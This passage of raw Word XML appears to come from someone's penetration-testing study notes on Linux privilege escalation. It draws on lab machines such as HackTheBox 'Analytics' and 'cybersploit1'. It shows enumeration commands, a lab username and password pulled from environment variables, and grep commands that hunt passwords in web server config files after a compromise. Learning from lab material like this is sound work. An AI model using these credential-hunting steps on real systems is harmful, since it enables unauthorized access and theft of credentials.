      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root specifically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="215"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command displays any environment variables that have been set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Analytics HTB, we saw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META_USER=metalytics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META_PASS=An4lytics_ds20223#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1209"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which is a username and password combination, which allowed SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating the kernel version (from Analytics HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for version vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="254000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="265" name="image270.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image270.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId428"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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15EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId429">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, and based on this output, we want to see if Linux "3.13.0-generic" is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find information like Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015EF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display information about the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific distribution of Linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the Linux Standard Base (LSB) that is running on the system (from Analytics HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for version vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a user in Linux, use "su" to switch into their account (once you know their password):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to log in as root user, just type "su" without any arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the "sudo -l" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have hacked into a web server, you can go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to find some credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/include/config.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or any other config files. They usually have some passwords and username, like maybe SQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use this to read many files at the same time for interesting stuff when we see many interesting file in the current directory we are in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i passw*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the -i flag in the grep command stands for "ignore case".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001600">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat * | grep -i [any usernames or something you're looking for]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001601">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ri passw* .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001602">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively look</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001603">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there are binary files in the directory, "cat" will stop, so here are some ways to avoid it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001604">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i "postgres" *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reads all files in the current directory without using "cat"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Cat" not really necessary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ai "postgres" *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001608">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flag "-a" forces all files (including binary) to be text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001609">
